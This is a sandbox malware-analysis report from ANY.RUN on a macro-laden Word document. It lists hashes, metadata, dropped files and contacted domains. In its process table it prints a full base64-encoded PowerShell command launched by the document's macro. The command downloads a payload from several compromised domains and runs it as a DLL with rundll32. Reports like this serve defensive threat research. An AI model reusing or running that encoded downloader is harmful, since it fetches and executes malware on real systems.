analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Documentation-906738957.doc

Full analysis: https://app.any.run/tasks/00f55fa5-59c5-4385-8cb0-c801ab5e0321
Verdict: Malicious activity
Analysis date: September 30, 2020, 13:49:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
maldoc-51
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Nobis., Author: Anas Chevalier, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 19:26:00 2020, Last Saved Time/Date: Tue Sep 29 19:26:00 2020, Number of Pages: 1, Number of Words: 3401, Number of Characters: 19391, Security: 8
MD5:

C4F5D61353C305C328156FC911CCBD8B

SHA1:

ADB7AF0BDB43F0A43218D3CC517AA8C1966FC15B

SHA256:

13938870BEF2D81300707E7A951B93345128E511A2970AFB62915FA26EB6D1AC

SSDEEP:

1536:NgpsKaEWMQsq98U1tqnyBCVXqf+m/zqux9kbM:SnPWMQsqqUnCZFmGY9kbM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • POwersheLL.exe (PID: 3008)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 3008)
    • PowerShell script executed

      • POwersheLL.exe (PID: 3008)
  • INFO

    • Reads settings of System Certificates

      • POwersheLL.exe (PID: 3008)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2564)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2564)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Nobis.
Subject: -
Author: Anaïs Chevalier
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:09:29 18:26:00
ModifyDate: 2020:09:29 18:26:00
Pages: 1
Words: 3401
Characters: 19391
Security: Locked for annotations
Company: -
Lines: 161
Paragraphs: 45
CharCountWithSpaces: 22747
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2564"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Documentation-906738957.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3008POwersheLL -ENCOD JABYAGMANwA3AG8AMQA2AD0AKAAoACcAWgB2AGMAJwArACcAcQAnACkAKwAoACcAdgA2ACcAKwAnADQAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABFAE4AVgA6AHUAcwBlAHIAcABSAE8AZgBJAGwARQBcAFIAOQB4ADQATwBiADUAXABNAFEAcgBsAEsAYgAxAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQByAGUAYwBUAG8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBgAGMAVQByAEkAVABgAHkAYABQAGAAUgBPAHQAbwBjAG8AbAAiACAAPQAgACgAKAAnAHQAbABzADEAMgAnACsAJwAsACcAKQArACcAIAB0ACcAKwAoACcAbABzADEAJwArACcAMQAsACcAKQArACcAIAAnACsAJwB0ACcAKwAnAGwAcwAnACkAOwAkAFMAawBqAGYANABpAHIAIAA9ACAAKAAoACcATgAnACsAJwA5AF8AJwApACsAJwBqAHoAJwArACcAZgAnACkAOwAkAEgAdQAwADEAagBmAHQAPQAoACgAJwBSAHUAJwArACcAaABpACcAKQArACcAMgAnACsAJwBtAHcAJwApADsAJABJAG4AbgBoAHoAeAA2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAoACcAYQAnACsAJwBsAG0AJwApACsAJwBSACcAKwAoACcAOQB4ACcAKwAnADQAbwAnACsAJwBiADUAYQBsAG0ATQBxAHIAbAAnACsAJwBrAGIAMQBhACcAKQArACcAbABtACcAKQAuACIAcgBlAFAAYABsAEEAQwBFACIAKAAoAFsAYwBoAGEAcgBdADkANwArAFsAYwBoAGEAcgBdADEAMAA4ACsAWwBjAGgAYQByAF0AMQAwADkAKQAsAFsAUwBUAFIAaQBuAEcAXQBbAGMAaABhAHIAXQA5ADIAKQApACsAJABTAGsAagBmADQAaQByACsAKAAnAC4AJwArACgAJwBkAGwAJwArACcAbAAnACkAKQA7ACQAWgBjAGoANQA1AF8AbwA9ACgAKAAnAFEAeABqACcAKwAnADQAbQAnACkAKwAnAGIAcgAnACkAOwAkAEsANQAxAGgAaQAyADkAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQBUAC4AVwBlAGIAQwBMAEkARQBuAHQAOwAkAEEANQA2ADMAMQA1AF8APQAoACgAJwBoAHQAdAAnACsAJwBwAHMAOgAvAC8AJwArACcAbQAnACkAKwAoACcAdQByAGYAJwArACcAcgBlAGUAcwBiAG8AcgBvAC4AJwArACcAZgAnACsAJwBhAGkAcgAnACkAKwAoACcAdwBhACcAKwAnAHkAJwApACsAKAAnAGMAbwBuACcAKwAnAGMAaQAnACkAKwAoACcAZQByAGcAJwArACcAZQAuAGMAJwArACcAbwBtAC8AJwApACsAKAAnAGYAagBvACcAKwAnADYAJwApACsAJwBnACcAKwAoACcANQAuAHQAeAAnACsAJwB0ACoAaAAnACsAJwB0ACcAKQArACgAJwB0ACcAKwAnAHAAcwA6ACcAKwAnAC8ALwByAHkAbgBlAHIALgAnACkAKwAoACcAbgBlAHQALgBhAHUAJwArACcALwBzAHEAJwArACcAdAAnACkAKwAnAHMAdwAnACsAJwA1AGEAJwArACgAJwAuACcAKwAnAHoAaQAnACkAKwAoACcAcAAqAGgAJwArACcAdAB0AHAAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AJwArACcAcwB1ACcAKQArACgAJwBuAG4AeQAnACsAJwBzAGkAZAAnACsAJwBlAGMAYQAnACkAKwAoACcAZgBlACcAKwAnAG0AaQAuACcAKQArACcAYwBvACcAKwAoACcAbQAvACcAKwAnAG4AcQAnACkAKwAoACcAaQB4AHYAagAnACsAJwBjAC4AcABkAGYAKgAnACsAJwBoAHQAdABwAHMAOgAvACcAKwAnAC8AdgAnACsAJwBpACcAKwAnAHMAJwArACcAdQBtACcAKQArACgAJwAzACcAKwAnADYAMAAuACcAKQArACcAYwAnACsAJwBvACcAKwAoACcAbQAuAHUAJwArACcAeQAnACkAKwAoACcALwBnADQAJwArACcAMABqACcAKwAnAHkAdwAnACkAKwAoACcANQAnACsAJwAuAHAAZABmACcAKwAnACoAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAcwA6AC8AJwArACcALwAnACsAJwB5AHUAbgBnAGUAJwApACsAKAAnAG4ALgBrACcAKwAnAGUAdgBpACcAKQArACgAJwBuAG0AJwArACcAYwAnACkAKwAoACcAYwBvACcAKwAnAGwAbABvAHcAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACgAJwBtACcAKwAnAC8AcwAnACkAKwAoACcAOQA4ADEAcQAnACsAJwB0AG0AJwApACsAKAAnAHUAJwArACcALgBwACcAKQArACcAZABmACcAKQAuACIAcwBwAGAAbABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABUADUAdwBtAHAAYQB3AD0AKAAnAEwAdgAnACsAJwBvADcAJwArACgAJwBuAHcAJwArACcAYwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEwAXwAxAHoAZwBtADkAIABpAG4AIAAkAEEANQA2ADMAMQA1AF8AKQB7AHQAcgB5AHsAJABLADUAMQBoAGkAMgA5AC4AIgBkAE8AYAB3AE4AbABgAG8AYABBAGQARgBJAEwAZQAiACgAJABMAF8AMQB6AGcAbQA5ACwAIAAkAEkAbgBuAGgAegB4ADYAKQA7ACQAWAB1AGEAZwBxAGwAcAA9ACgAJwBEAGYAJwArACcAYwB3ACcAKwAoACcAOAAnACsAJwAxAHkAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQASQBuAG4AaAB6AHgANgApAC4AIgBMAEUAYABOAGcAYABUAGgAIgAgAC0AZwBlACAAMwAyADMAOQA4ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAbABsACcAKwAnADMAMgAnACsAJwAuAGUAeABlACcAKQAgACQASQBuAG4AaAB6AHgANgAsADAAOwAkAFYAcwA4ADIAawAwADAAPQAoACgAJwBBACcAKwAnAG8AagAnACkAKwAnAHYAdAAnACsAJwBxAGIAJwApADsAYgByAGUAYQBrADsAJABLADgANABiAGsAOABxAD0AKAAnAEkAJwArACgAJwBnAGsAJwArACcAOQBfAG0AJwArACcAegAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQA0AHQAZQBmAGYAdwA9ACgAJwBCADEAJwArACcAcQAnACsAKAAnADgAZwAxACcAKwAnAHgAJwApACkA C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 922
Read events
1 015
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
2564WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRAAD7.tmp.cvr
MD5:
SHA256:
3008POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0NTQTX39Y6VSJDY78YUP.temp
MD5:
SHA256:
2564WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:4E1261458C3E297C14700BD7AB598941
SHA256:B273CF320C220000F00A8AB914A2611428A1C124D8C3AF6F1353F0A652E7FEAB
2564WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Documentation-906738957.doc.LNKlnk
MD5:33D0181B87DAFA0D7D18293F442F4FE7
SHA256:2A923C00621CD6FD48EEB445CDD14893B03453DD19D02D04DF2F006BA4FC58DE
2564WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:0FAA352AC76D2E686DE719AC808E0BD7
SHA256:6AA1BFDEBFDD7831762FADD886B0A1D92CD169C27E3F7CE497C01B7D685DC037
2564WINWORD.EXEC:\Users\admin\Desktop\~$cumentation-906738957.docpgc
MD5:7BCDD145A0CBD8EB71B32D2A97FD0E09
SHA256:7261445B404B79491AA39A6758B08B24103E11EE2B2E9F4BDE880E9AAFF5F36B
3008POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ab9db.TMPbinary
MD5:36FE326E12493E805B62142553A1E43C
SHA256:3DD6ACC81930940EC26CE9794D473AC8869FCDB0D48BC71A20C27D80FF693B9F
2564WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:E51C8E015688371AC4BAC6A289C081DD
SHA256:D613A53BB4A4BA2E71BFB07553B9F8233F1924C7AEF302F0609909FEC6FBAB12
3008POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:36FE326E12493E805B62142553A1E43C
SHA256:3DD6ACC81930940EC26CE9794D473AC8869FCDB0D48BC71A20C27D80FF693B9F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
5
DNS requests
8
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3008
POwersheLL.exe
192.254.185.2:443
sunnysidecafemi.com
Unified Layer
US
malicious
3008
POwersheLL.exe
170.249.199.66:443
visum360.com.uy
US
unknown
3008
POwersheLL.exe
75.119.215.217:443
murfreesboro.fairwayconcierge.com
New Dream Network, LLC
US
suspicious
185.149.112.234:443
ryner.net.au
Skylinevision Telecom LLC
CZ
suspicious
3008
POwersheLL.exe
67.205.57.212:443
yungen.kevinmccollow.com
New Dream Network, LLC
US
unknown

DNS requests

Domain
IP
Reputation
murfreesboro.fairwayconcierge.com
  • 75.119.215.217
suspicious
ryner.net.au
  • 185.149.112.234
suspicious
sunnysidecafemi.com
  • 192.254.185.2
suspicious
visum360.com.uy
  • 170.249.199.66
unknown
yungen.kevinmccollow.com
  • 67.205.57.212
unknown

Threats

No threats detected
No debug info